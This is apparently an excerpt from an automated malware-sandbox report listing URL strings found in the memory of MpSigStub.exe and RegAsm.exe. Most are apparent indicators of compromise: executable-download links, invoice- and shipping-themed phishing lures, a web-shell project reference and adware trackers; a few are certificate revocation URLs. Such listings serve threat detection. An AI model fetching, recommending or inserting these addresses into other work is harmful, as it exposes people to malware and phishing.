Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://camaraquiterianopolis.ce.gov.br/rechnung/
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://canadahalalec.com/b685cf9fdc885f90abbb39b13022d1c4.php?q=
Source: MpSigStub.exe, 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/(%w%w
Source: MpSigStub.exe, 00000023.00000003.6289828443.0000028BD74D2000.00000004.00000001.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/3
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://capers07.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://capsnit.com
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: http://captinads.com/oldtest/page.php
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://care-indonesia.org/open-invoices/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://cargohl.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://carrentalhelp.org/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://carrythelamp.net?
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://carsgirlssexy.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://casaalberti.com/wp-content/files_mf/2/resume.php?id=
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://casinotropez.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://cassia89.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://cassia89.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://catatanerwin.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://catatanfarhans.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://catell.ru/set.js
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://cbadenoche.com
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://cbl.toolbar4free.com/cgi-bin/s.exe
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	String found in binary or memory: http://cc.advancedpccare.com/wcfCountryPricing/countrypricing.svc/GetCountryCode
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://ccc.avn12.cn/ccc/qqqccc/post.asp?i=77
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://ccdelsur.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: http://ccfairy.com/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.ap.bittorrent.com/control/tags/
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.chatcdn.net
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.che.moe/ymufnn.exe
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=126
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=130
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.montiera.com/mntr/cmn/addonmsg.htmx
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.starter.fm/s/tuto4pc/ads/fr/startertv/player_tv.html?
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.zry97.com/youxi
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.zry97.com/youxi/index_x
Source: MpSigStub.exe, 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp	String found in binary or memory: http://cdsa.xyz
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://ceaircelle76.org/2.php?configklvar=1
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://cekirdekinanc.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://celebrity-nude-fuck.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://celebritybeefcake.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://celebs21mangap.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://centralcarqocn.com/fax/fe.doc
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://cert.beahh.com/cert.php
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://chambahistory.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://chemgioaz.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://chilai.com/system/libraries/tep.txt
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://chistepordia.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://chiuwes.com//kemu.exe
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://chnfsub2manglobalsndy2businessexytwo.duckdns.org/office/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://chu.pe/6xo
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://chutkiraani.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://chuyenquanaotreem.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://cicahroti.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://citw-vol2.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://cjrajan.pw/2/3/4/invoice.docx
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://ckpetchem.com
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://cl.1ck.me/
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://clarityupstate.com/b.ocx
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://claus-wieben.de/sdor1om4hl5naz
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://clean-pelican.cloudvent.net/dxdae.html)
Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmp	String found in binary or memory: http://clean.systemerrorfixer.com/MTg1MzE=/2/
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://cleanwebsearch.com/?q=
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://client.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: http://clientportal.download/123.php
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: http://clientportal.download/div.php
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://clients.lb1networks.com/upd.php?
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://cloud-search.linkury.com
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: http://clubdelaparrilla.cl/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://cn%d.evasi0n.com
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://cnr.org.br/ups-quantum-view
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://cns.3721.com/cns.dll?xC
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://coastervilleregalos.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://cock4worship.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://coconut-pete.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://code.google.com/p/b374k-shell
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://coltaddict.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://comfirm001.site.bz/hl/dhl%20zip/dhl/dhl%20_%20tracking.htm
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://community.derbiz.com/
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://company.superweb.ws/view/note.exe
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://companyprivatedocumentservershub100000.braddocksrentals.com/commondocs/)
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://computerscience2.com/document-needed/
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://config.juezhao123.com/c.ashx?ver=&c=
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://connect.act-sat-bootcamp.com/dana/home.php
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://construtoramistral.com.br/
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://consumerinput.com/privacy
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	String found in binary or memory: http://continuetosave.info/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://coolwalpaper.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://cooperjcw.xyz/bjsdke.exe
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://coppolarestaurant.com/cgi/resume2.php?id=
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://costacars.es/ico/ortodox.php
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://count.e-jok.cn/count.txt
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://count.key5188.com/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://count.key5188.com/vip/get.asp?mac=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://countdutycall.info/1/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://countexchange.com/config/line.gif
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://countrtds.ru/tdstrf/index.php
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://cpanel.asimsrl.com/ifk/cat.php
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://cpr-foundation.org/library/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://cpr-foundation.org/reportmaersknew.php
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://cprvstd4upcomingtalentanimationauditnyc.duckdns.org/receipt/invoice_112229.doc
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://cpvfeed.mediatraffic.com/feed.php?ac=%s&kw=%s&url=%s&ip=%s&rfo=xml
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://cr-installer-fallback.s3-us-west-2.amazonaws.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://craghoppers.icu/Order.jpg
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: RegAsm.exe, 0000000A.00000002.7230854091.00000000015A3000.00000004.00000020.sdmp, MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: RegAsm.exe, 0000000A.00000002.7230854091.00000000015A3000.00000004.00000020.sdmp, MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://crocus93.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://crxupdate.pw/Crxx/background.js
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://crxupdate.pw/Crxx/flash.xpi
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://cs-skiluj.sanfre.eu/vmjz848148/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://cs.zhongsou.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://cscentralcard.com.br/colors/coffee/report-sfexpress.php
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://csgo-run.xyz/dl.exe
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://csjksco.com/initial/)
Source: RegAsm.exe, 0000000A.00000002.7256181093.000000002035D000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en)Z
Source: RegAsm.exe, 0000000A.00000002.7255877964.0000000020340000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 0000000A.00000002.7257151575.0000000020410000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?83c608206b3df
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://cts.hotbar.com/
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://cts.hotbar.com/trackedevent.aspx
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://cupid.556677889900.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://cvcviagens.sslblindado.com/documento.rtf
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://cvfanatic.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://cxdlk.esy.es/iej3d1/)
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://d.20apoaf.com/xuiow/
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://d1hxtl9znqwejj.cloud
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://d2.3dprotect.net:90/update/?id=%d
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	String found in binary or memory: http://d2xpmajse0mo96.cloudfront.net/app/ver/ssl.php
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://d4uk.7h4uk.com/w_case/login.php
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://dailytop10tracker.com/important-please-read/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://danielflors.com/question/
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://data.webwatcherdata.com/v51/ClientService.asmxx
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://data1.yoou8.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://dating2u.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingaction.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingbank.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingexplorer.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingfavorite.com
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingfavorite.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingfirst.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datinggallery.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datinggate.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingleader.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingmachine.net
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://datingvirtual.net
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://dec.ip3366.net/api/?key=20171119174239256&getnum=99999&proxytype=0
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://default.home
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://defaultincoming.mangospot.net/prf/reg.dot
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://delta-akb.ru/image/data/goods/dtm/.../log.php?f=404
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://deluvis.net/
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://det-colors.ru/invoice-number-09203/
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://dev.northzone.it/ds/2312.gif
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://df20.dot5hosting.com/~shitshir
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://dhm-mhn.com/htamandela.hta
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.bunm.de/
